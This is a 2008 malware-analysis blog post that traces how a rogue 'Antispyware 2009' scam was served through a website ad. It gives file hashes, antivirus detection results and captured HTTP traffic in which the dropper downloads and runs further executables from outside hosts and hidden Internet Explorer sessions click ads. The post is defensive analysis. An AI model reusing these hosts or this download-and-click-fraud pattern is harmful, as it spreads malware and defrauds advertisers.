Rogue Antispyware 2009 served through beedly.us ADS
Today, when I was browsing the beedly.us website, I saw a suspicious ADS link where there was a link to the malicious website proantispyware2009(dot)com, so I started to analyze the link and, below, there is the result:
So after clicking on the ADS I was redirected to a new sub-domain:
and if we view the HTML code is possible to see that if we click in the remove button we will be prompted to download a file named setup_246_3777_.exe that is the real setup file of the rogue security software.
Report Generated 13.11.2008 at 20.33.51 (GMT 1)
Filename: setup_246_3777_.exe
File size: 112 KB
MD5 Hash: E9339F9045368947789EC70739DE4B21
SHA1 Hash: DC7B37C1158F5AD4D3E092AFCADE58A5E3FC145B
Application Type: Executable (EXE) 32bit
Detection Rate: 0 on 23
After I executed the .EXE file we started to get some new traffic:
1 2 3 4 5 6 7 | GET /get/?type=scanner&pin=246&lnd=3777 HTTP/1.1 User-Agent: Installer Host: dl.storage-antispyware.com HTTP/1.1 200 OK Content-Disposition: attachment; filename=scanner_246_3777_.exe Content-Transfer-Encoding: binary |
From this traffic we can see that a new file is downloaded:
1 | filename=scanner_246_3777_.exe |
It is the installer for the rogue security software Antispyware 2009!
Report Generated 13.11.2008 at 21.24.07 (GMT 1)
Filename: scanner_246_3777_.exe
File size: 811 KB
MD5 Hash: E0F855C6C5FC93F0A8ED1FE9E702E492
SHA1 Hash: 77ACC5822A5EBD734075BDF4752EC6F10617050F
Detection Rate: 9 on 23Antivirus Result
a-squared Trojan.Fakealert.ads.1!IK
Avira AntiVir TR/Fakealert.ads.1
Avast Win32:Spyware-gen [Trj] (0)
AVG Trojan horse SHeur.CQDP
BitDefender Trojan.FakeAlert.AKQ
ClamAV –
Comodo –
Dr.Web –
Ewido –
F-PROT 6 –
G DATA Win32:Spyware-gen [Trj] B
IkarusT3 Trojan.Fakealert.ads.1
Kaspersky –
McAfee PWCrack-Winspy trojan
NOD32 v3 –
Norman Aggressive commersial W32/AntiVirus2008.TB ()
Panda –
QuickHeal –
Solo Antivirus –
Sophos –
TrendMicro –
VBA32 –
VirusBuster –
Next, a new .EXE is downloaded and executed in my system:
1 2 3 4 5 6 7 | GET /mxlivemedia/get_file.php HTTP/1.1 User-Agent: Installer Host: 85.92.157.141 GET /mxlivemedia/multi/16.exe HTTP/1.1 User-Agent: Installer Host: 85.92.157.141 |
and the file is:
1 | Location: multi/16.exe |
Report Generated 13.11.2008 at 20.39.42 (GMT 1)
Filename: 16.exe
File size: 598 KB
MD5 Hash: 9A785CF7901E348C1840925EB5E0C5CC
SHA1 Hash: 189EEA8FB44360C5E4011BB471D7F1D8F7B3F7AC
Detection Rate: 2 on 23Antivirus Result
a-squared –
Avira AntiVir –
Avast –
AVG –
BitDefender Generic.Adw.Rotator.FF995C71
ClamAV –
Comodo –
Dr.Web –
Ewido –
F-PROT 6 –
G DATA –
IkarusT3 –
Kaspersky Trojan-Clicker.Win32.Agent.evi
McAfee –
NOD32 v3 –
Norman –
Panda –
QuickHeal –
Solo Antivirus –
Sophos –
TrendMicro –
VBA32 –
VirusBuster –
After 16.exe is executed we started to get new traffic from new hosts:
1 2 3 4 5 6 7 8 9 10 | GET /stat.php?func=install&pid=246&ip=127.0.0.1&landing=3777 Host: int.vbvyu.com GET /smb/nsi_install.php?inst_result=success&hwid=xxx Host: a2.mxlivemedia.com User-Agent: NSISDL/1.2 (Mozilla) GET /bc/nsi_install.php?aff_id=mxlivemedia&inst_result=success&id=xxx Host: a1.mxlivemedia.com User-Agent: NSISDL/1.2 (Mozilla) |
and after, IEXPLORE.EXE was executed hidden and the malware started to clickjack the ADS Links hidden!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | GET /servlet/ajrotator/246392/0/vh?z=icm&dim=186262 Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48dcc730ea0ce.html Host: rotator.its.adjuggler.com GET /servlet/ajrotator/7678/0/vh?z=ast&ch=7108&dim=56 Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48e220b3afd5f.html Host: servedby.topqualityads.net GET /bc/ads/300x250/48e220b3afd5f.html Referer: http://a1.mxlivemedia.com/bc/123kah.php Host: a1.mxlivemedia.com GET /bc/ads/160x600/48e220b3afd5f.html Referer: http://a1.mxlivemedia.com/bc/123kah.php Host: a1.mxlivemedia.com GET /bc/ads/728x90/48e220b3afd5f.html Referer: http://a1.mxlivemedia.com/bc/123kah.php GET /bc/ads/728x90/48dcc730ea0ce.html Referer: http://a1.mxlivemedia.com/bc/123kah.php Host: a1.mxlivemedia.com POST /bc/123kah.php Host: a1.mxlivemedia.com |
After, new files was created in system32:
Report Generated 13.11.2008 at 20.50.00 (GMT 1)
Filename: msclgkhvhfp.dll
File size: 173 KB
MD5 Hash: 8532E92178E9126A151E31683D896C31
SHA1 Hash: 088E2728D8D7D5E185AF231F54D917605F7CED24
Detection Rate: 6 on 23Antivirus Result
a-squared Generic.Adw.Rotator!IK
Avira AntiVir –
Avast –
AVG –
BitDefender Generic.Adw.Rotator.FF995C71
ClamAV –
Comodo –
Dr.Web –
Ewido –
F-PROT 6 –
G DATA Trojan-Clicker.Win32.Agent.evi A
IkarusT3 Generic.Adw.Rotator
Kaspersky Trojan-Clicker.Win32.Agent.evi
McAfee AdClicker-GI trojan
NOD32 v3 –
Norman –
Panda –
QuickHeal –
Solo Antivirus –
Sophos –
TrendMicro –
VBA32 –
VirusBuster –
Below there are the IEXPLORE.EXE connections:
And finally appeared the image of the rogue security software Antispyware 2009 in the screen:
I have created a small summary of the activity of what happened during this analysis:
And after reading the article of SophosLabs that steve has posted in the comments, I have analyzed with OllyDbg the file setup_246_3777_.exe and below there are some images:
Original Entry Point:
Now, if I follow the address CALL 0040116D, I arrive at the code shown in the image below:
And now, If I follow the address MOV EDX,00405DEC, I arrive at the code shown in image below, that is full of zero bytes (similar to the analysis of SophosLabs):
And for finish, below, I have added some images of the fake alerts shown by Pro Antispyware 2009:
Make sure to not fall in this scam, if your computer is infected with Antispyware 2009, it is recommended to remove it immediately and to scan your system with NoVirusThanks Malware Remover.
Leave a Reply